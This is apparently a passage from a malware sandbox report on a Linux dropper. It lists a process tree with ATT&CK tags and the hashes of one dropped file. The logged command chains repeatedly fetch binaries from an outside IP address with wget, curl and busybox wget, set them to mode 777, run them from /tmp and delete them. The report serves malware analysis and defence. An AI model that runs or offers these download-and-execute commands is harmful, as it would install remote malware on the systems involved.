                                                                                                                                                /bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                2⤵
                                                                                                                                                  PID:1671
                                                                                                                                                • /bin/chmod
                                                                                                                                                  chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                  2⤵
                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                  PID:1672
                                                                                                                                                • /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                  ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1673
                                                                                                                                                • /bin/rm
                                                                                                                                                  rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1674
                                                                                                                                                  • /usr/bin/wget
                                                                                                                                                    wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                    PID:1675
                                                                                                                                                  • /usr/bin/curl
                                                                                                                                                    curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                    • Writes file to tmp directory
                                                                                                                                                    PID:1676
                                                                                                                                                  • /bin/busybox
                                                                                                                                                    /bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                    PID:1677
                                                                                                                                                  • /bin/chmod
                                                                                                                                                    chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                    PID:1678
                                                                                                                                                  • /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    ./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                    PID:1679
                                                                                                                                                  • /bin/rm
                                                                                                                                                    rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                    PID:1680
                                                                                                                                                  • /usr/bin/wget
                                                                                                                                                    wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1681
                                                                                                                                                    • /usr/bin/curl
                                                                                                                                                      curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                      2⤵
                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                      PID:1682
                                                                                                                                                    • /bin/busybox
                                                                                                                                                      /bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1683
                                                                                                                                                      • /bin/chmod
                                                                                                                                                        chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                        2⤵
                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                        PID:1684
                                                                                                                                                      • /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                        ./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:1685
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1686
                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                          wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1687
                                                                                                                                                          • /usr/bin/curl
                                                                                                                                                            curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                            2⤵
                                                                                                                                                            • Writes file to tmp directory
                                                                                                                                                            PID:1688
                                                                                                                                                          • /bin/busybox
                                                                                                                                                            /bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1691
                                                                                                                                                            • /bin/chmod
                                                                                                                                                              chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                              2⤵
                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                              PID:1692
                                                                                                                                                            • /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                              ./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1693
                                                                                                                                                            • /bin/rm
                                                                                                                                                              rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1694
                                                                                                                                                              • /usr/bin/wget
                                                                                                                                                                wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1695
                                                                                                                                                                • /usr/bin/curl
                                                                                                                                                                  curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                  PID:1696
                                                                                                                                                                • /bin/busybox
                                                                                                                                                                  /bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1697
                                                                                                                                                                  • /bin/chmod
                                                                                                                                                                    chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                    2⤵
                                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                                    PID:1698
                                                                                                                                                                  • /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                    ./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:1699
                                                                                                                                                                  • /bin/rm
                                                                                                                                                                    rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1700

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

                                                                                                                                                                    Filesize

                                                                                                                                                                    153B

                                                                                                                                                                    MD5

                                                                                                                                                                    998368d7c95ea4293237f2320546e440

                                                                                                                                                                    SHA1

                                                                                                                                                                    30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                                                                                                                                                                    SHA256

                                                                                                                                                                    533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                                                                                                                                                                    SHA512

                                                                                                                                                                    648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97